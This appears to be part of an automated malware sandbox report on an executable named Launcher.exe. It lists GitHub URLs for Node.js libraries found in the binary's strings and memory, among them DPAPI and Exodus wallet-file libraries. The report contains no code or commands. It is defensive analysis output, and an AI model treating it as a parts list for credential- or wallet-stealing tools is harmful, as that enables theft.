          Source: Launcher.exe, 00000000.00000003.1398162788.00000174E05CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite
          Source: Launcher.exe, 00000000.00000003.1398162788.00000174E05CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/issues
          Source: Launcher.exe, 00000000.00000003.1423798353.00000174E0DA1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0DAD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0D91000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Javascript-source-file-encodings
          Source: Launcher.exe, 00000000.00000003.1423798353.00000174E0DA1000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0DAD000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1423798353.00000174E0D91000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1411921117.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/ashtuchkin/iconv-lite/wiki/Use-Buffers-when-decoding
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/audriusk)
          Source: Launcher.exe, 00000000.00000003.1118712238.00000174E043A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/axios/axios/issues/69
          Source: Launcher.exe, 00000000.00000003.1419380194.00000174E07B0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1415719735.00000174E04D6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1389723018.00000174E313D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/bradhugh/node-dpapi
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32/raw/master/LICENSE
          Source: Launcher.exe, 00000000.00000003.1269670185.0000021EFF381000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/brianloveswords/buffer-crc32/raw/master/LICENSEA
          Source: Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args
          Source: Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args.git
          Source: Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/calvinmetcalf/process-nextick-args/issues
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E045C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1139296292.00000174E045C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/caolan/async.git
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1135628118.00000174E045C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1139296292.00000174E045C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/caolan/async/issues
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/carter-thaxton)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/ansi-regex/blob/HEAD/index.js
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chalk/supports-color
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorith
          Source: Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/cryptocoinjs/base-x
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/da-x/rxvt-unicode/tree/v9.22-with-24bit-color
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/daniellockyer)
          Source: Launcher.exe, 00000000.00000003.1439427235.00000174E0A1B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1451888131.00000174E0A1F000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440789272.00000174E0555000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1455742179.00000174E046E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1451888131.00000174E0A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dchest/tweetnacl-js
          Source: Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge
          Source: Launcher.exe, 00000000.00000003.1462539823.00000174E0520000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge/blob/cbebca3780658703d925b61b2caffb1d263a6c1d/LICENSE
          Source: Launcher.exe, 00000000.00000003.1439427235.00000174E0A1B000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1440789272.00000174E0555000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1455742179.00000174E046E000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1451888131.00000174E0A29000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge/blob/master/lib/asn1.js#L542
          Source: Launcher.exe, 00000000.00000003.1428225050.00000177B9F41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/digitalbazaar/forge/issues
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/electron/electron-rebuild)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/estree/estree/blob/a27003adf4fd7bfad44de9cef372a2eacd527b1c/es5.md#regexpliteral
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/exodusmovement/seco-file#readme
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/exodusmovement/seco-file.git
          Source: Launcher.exe, 00000000.00000003.1474969662.00000174E0683000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/exodusmovement/seco-file/issues
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/felixge/node-combined-stream
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1121188278.00000174E05F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/felixge/node-delayed-stream
          Source: Launcher.exe, 00000000.00000003.1273794099.000003DB1B601000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/safe-buffer
          Source: Launcher.exe, 00000000.00000003.1273794099.000003DB1B601000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/feross/safe-buffer/issues
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0556000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/follow-redirects/follow-redirects
          Source: Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0556000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/follow-redirects/follow-redirects/issues
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/follow-redirects/follow-redirects/issues:M
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/follow-redirects/follow-redirectsM
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/google/closure-compiler/wiki/Source-Maps
          Source: Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/grumdrig)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/heycam/webidl/pull/946.
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/isaacs/color-support.
          Source: Launcher.exe, 00000000.00000003.1150082627.00000174E05DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/core-util-is/issues
          Source: Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E0558000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/fs.realpath.git
          Source: Launcher.exe, 00000000.00000003.1251349025.000000A8F3201000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191986739.00000174E0518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/inflight
          Source: Launcher.exe, 00000000.00000003.1251349025.000000A8F3201000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1191986739.00000174E0518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/inflight/issues
          Source: Launcher.exe, 00000000.00000003.1140870149.00000174E0581000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0575000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05BF000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E05BB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/minimatch
          Source: Launcher.exe, 00000000.00000003.1279565595.0000019DB30C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E05DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-glob/issues/167
          Source: Launcher.exe, 00000000.00000003.1279565595.0000019DB30C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E05DB000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E0560000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1153958014.00000174E04D5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1155551672.00000174E055C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E056C000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1184973623.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1280865643.0000036048281000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E054C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-glob/issues/205
          Source: Launcher.exe, 00000000.00000003.1281112162.000000726FF41000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1140870149.00000174E055D000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134121610.00000174E06F3000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1144272242.00000174E06F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-graceful-fs
          Source: Launcher.exe, 00000000.00000003.1140870149.00000174E0542000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1147575346.00000174E0661000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/isaacs/node-graceful-fs/issues/4
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jcrugzz)
          Source: Launcher.exe, 00000000.00000003.1152549783.00000174E07FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E07FC000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146130990.00000174E0800000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1152549783.00000174E0800000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jonschlinkert/normalize-path
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/joyent/node/issues/3295.
          Source: Launcher.exe, 00000000.00000003.1266819434.00000038D8AC1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E05F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream
          Source: Launcher.exe, 00000000.00000003.1266819434.00000038D8AC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream.git
          Source: Launcher.exe, 00000000.00000003.1266819434.00000038D8AC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream.git1f
          Source: Launcher.exe, 00000000.00000003.1266819434.00000038D8AC1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/jpommerening/node-lazystream/issues
          Source: Launcher.exe, 00000000.00000003.1459581379.00000174E0A1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/jprichardson/node-fs-extra/issues/269
          Source: Launcher.exe, 00000000.00000003.1139296292.00000174E0434000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/balanced-match
          Source: Launcher.exe, 00000000.00000003.1135628118.00000174E0440000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1265038547.00000061CD4C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1139296292.00000174E0440000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/brace-expansion
          Source: Launcher.exe, 00000000.00000003.1140870149.00000174E0530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/juliangruber/isarray
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kewde)
          Source: Launcher.exe, 00000000.00000003.1444280656.00000174E0454000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kjur/jsjws/blob/master/rsa.js:
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kkaefer)
          Source: Launcher.exe, 00000000.00000003.1462539823.00000174E0530000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/kripken/emscripten/issues/5820
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/libuv/libuv/pull/1501.
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmp, Launcher.exe, 00000000.00000003.1152998643.00000174E048A000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream
          Source: Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-stream/issues
          Source: Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/end-of-streamG30
          Source: Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1207851036.00000174E067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants
          Source: Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1207851036.00000174E067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants.git
          Source: Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1207851036.00000174E067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants/issues
          Source: Launcher.exe, 00000000.00000003.1261591068.00000112103C1000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/fs-constants1
          Source: Launcher.exe, 00000000.00000003.1142630915.00000174E08E6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08E6000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1142630915.00000174E08E2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1154654438.00000174E08E2000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mafintosh/pump
          Source: Launcher.exe, 00000000.00000003.1202995845.00000174E092E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream
          Source: Launcher.exe, 00000000.00000003.1202995845.00000174E0916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream.git
          Source: Launcher.exe, 00000000.00000003.1202995845.00000174E0916000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mafintosh/tar-stream/issues
          Source: Launcher.exe, 00000000.00000003.1260785845.0000015B71801000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/mcollina)
          Source: Launcher.exe, 00000000.00000003.1303873900.00000174E03F7000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1310062480.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1235590238.00000174E0F4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/mrjjwright)
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/mysticatea/abort-controller
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node-v0.x-archive/issues/2876.
          Source: Launcher.exe, 00000000.00000003.1304741080.00000174E00B5000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1351646643.00000174E00B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/1a96d83a223ff9f
          Source: Launcher.exe, 00000000.00000003.1108487541.00000174E005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/1a96d83a223ff9f05f7d942fb84440d323f7b596/lib/internal/bootstrap/
          Source: Launcher.exe, 00000000.00000003.1279565595.0000019DB30C1000.00000004.00001000.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1183107459.00000174E05B0000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1255111010.000002C308E41000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/b3fcc245fb25539909ef1d5eaa01dbf92e168633/lib/path.js#L56
          Source: Launcher.exe, 00000000.00000003.1144705420.00000174E0450000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1153958014.00000174E0458000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1144705420.00000174E0458000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/blob/v10.8.0/lib/internal/errors.js
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/10673
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/13435
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/19009
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2006
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/2119
          Source: Launcher.exe, 00000000.00000003.1143818781.00000174E0500000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1134655854.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1206541838.00000174E0500000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1146738289.00000174E0609000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1193599750.00000174E0500000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1127605784.00000174E0601000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1138033598.00000174E0500000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1130016639.00000174E0556000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1222075886.00000174E0500000.00000004.00000020.00020000.00000000.sdmp, Launcher.exe, 00000000.00000003.1137685173.00000174E0609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/22066
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/3392
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/34532
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35452
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35475
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35862
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/35981
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39707
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/issues/39758
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12342
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/12607
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/13870#discussion_r124515293
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/1771#issuecomment-119351671
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/21313
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/26334.
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30380#issuecomment-552948364
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/30958
          Source: Launcher.exe, 00000000.00000003.1108487541.00000174E005C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33229
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33515.
          Source: Launcher.exe, 00000000.00000000.1074024698.00007FF65DA1B000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: https://github.com/nodejs/node/pull/33661
